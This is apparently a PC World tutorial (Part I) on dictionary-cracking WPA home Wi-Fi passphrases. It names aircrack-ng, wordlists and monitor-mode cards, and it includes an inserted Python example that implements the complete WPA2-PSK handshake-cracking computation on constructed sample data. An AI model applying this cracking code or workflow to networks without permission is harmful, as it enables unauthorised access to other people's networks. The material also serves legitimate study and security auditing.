Cracking WPA wireless networks
Part I: Assembling the tools
Wireless networks are everywhere, but many are insecure. The older WEP protocol has been thoroughly compromised and most users now rely on the more robust WPA protocol. But a chain is only as strong as its weakest link, and in WPA's home (pre-shared key) mode that weak link is invariably the passphrase used to secure the network. So I decided to try a little wi-fi cracking to see how easy it is ...
Wow! In little over an hour I went from neophyte to bona fide cracker, my first pwned network under my belt. It's disturbingly simple. Here's how I did it ...
| Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal! |
The basic toolset consists of three parts:
- aircrack-ng
- a wordlist
- a suitable wireless receiver
First, the easy stuff ...
The Software
Aircrack-ng isn't a single program, it's a suite of more than a dozen tools for auditing wireless networks. It runs under Linux and Windows, there's a version for VMware virtual machines, and even a proof-of-concept version for the iPhone.
Linux users can install the whole suite by simply selecting "aircrack-ng" from their distribution's repository. Other users can download the latest from aircrack-ng's site.
Another alternative is to download the ready-built Slitaz Live Aircrack-ng Distribution. It's a bootable Linux CD with aircrack-ng built in.
The other piece of software you'll need is a password wordlist. In its home ("personal") mode, WPA derives every key on the network from a single pre-shared passphrase, and a client proves it knows that passphrase in the four-way handshake it performs when it joins. Cracking is done offline: you capture one such handshake, then take one word at a time from the wordlist, run it through the same key derivation the client used (with the network name mixed in as salt) and check whether the resulting handshake checksum matches the one you captured. If this sounds slow and laborious, it is, and deliberately so: the derivation is designed to be expensive, so every guess costs thousands of hash operations. Still, it's the sort of thing that computers excel at. Depending on your processor, it's possible to test from a few hundred to a few thousand candidates per second.
Googling for "wordlists" will turn up dozens, in many different languages. I settled for the English dictionary from this collection. It contains a modest 300,000 possible passwords in a 1MB file. Obviously, the bigger the wordlist, the more likely you are to crack the password. If you're really keen, there's the Openwall Wordlist Collection, a 33GB whopper that costs around US$30.
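To make the "derive and compare" step above concrete, here is an added worked example (mine, not code from the article or from the aircrack-ng project) of the WPA2-PSK computation a cracker performs for each wordlist entry: PBKDF2 turns the passphrase and SSID into the PMK, the 802.11i PRF expands it with the two MAC addresses and the two handshake nonces into the PTK, and the first 16 bytes of the PTK key the checksum (the EAPOL Key MIC) that is compared with the captured one. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed for the example, and because there is no real capture to read, the "captured" handshake message is built here with a genuine MIC so that the dictionary loop has something to test against.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Everything below (SSID, MACs, nonces, passphrase, wordlist) is constructed for this example.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make each guess cost thousands of SHA-1 operations."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenate HMAC-SHA1(K, A || 0x00 || B || i) for i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", b)


# Offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame
    with its own MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Construct a minimal handshake message 2 (client -> AP) with an all-zero MIC field."""
    body = struct.pack(">BHHQ", 2, 0x010A, 0, 1)  # RSN descriptor; key info = pairwise|MIC|version 2; replay counter 1
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # SNonce, IV, RSC, key ID
    body += b"\x00" * 16 + struct.pack(">H", 0)                 # MIC placeholder, key data length 0
    return struct.pack(">BBH", 1, 3, len(body)) + body           # EAPOL version 1, type 3 (Key)


def build_sample_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """Stand-in for a real capture: message 2 carrying a genuine MIC for the given passphrase."""
    frame = build_msg2(snonce)
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], frame)  # the KCK is the first 16 bytes of the PTK
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, frame, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one PBKDF2 + PRF + HMAC per candidate, compared with the captured MIC."""
    captured = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        word = word.strip()
        if not 8 <= len(word) <= 63:  # WPA passphrases are 8-63 characters; anything else is skipped for free
            continue
        ptk = derive_ptk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], frame), captured):
            return word
    return None


# Constructed sample network and wordlist (not real data)
SSID = "CoffeeShop"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "qwerty123", "butterfly1", "trustno1"]
SAMPLE_FRAME = build_sample_handshake("butterfly1", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)

if __name__ == "__main__":
    print("recovered passphrase:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, SAMPLE_FRAME, WORDLIST))
```

Two things worth noticing: the salt is the SSID, so a precomputed table of PMKs only helps against networks with the same name, and the 8-to-63-character rule means a general-purpose wordlist wastes effort unless the short entries are filtered out first.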
The Hardware
To begin cracking you'll also need a suitable network card, one that can be flipped into what's known as "monitor mode", in which it hands every frame it hears to the software without joining any network. That's what lets you capture the handshake you'll later test the wordlist against. The aircrack-ng website has a useful tutorial here: Is My Wireless Card Compatible?
If you do have a compatible card, use their Compatibility Drivers page to see if aircrack-ng will work okay with it, and what drivers you'll need, if any.
If all that sounds a bit daunting, you can simply buy a suitable USB network card and bypass the one in your PC. What is the Best Wireless Card to Buy? will help. I picked up a USB-based RTL8187L device for a little over $20.
We're now ready for the fun stuff. Part II coming soon ...!

PC World is New Zealand’s top selling computing and technology magazine.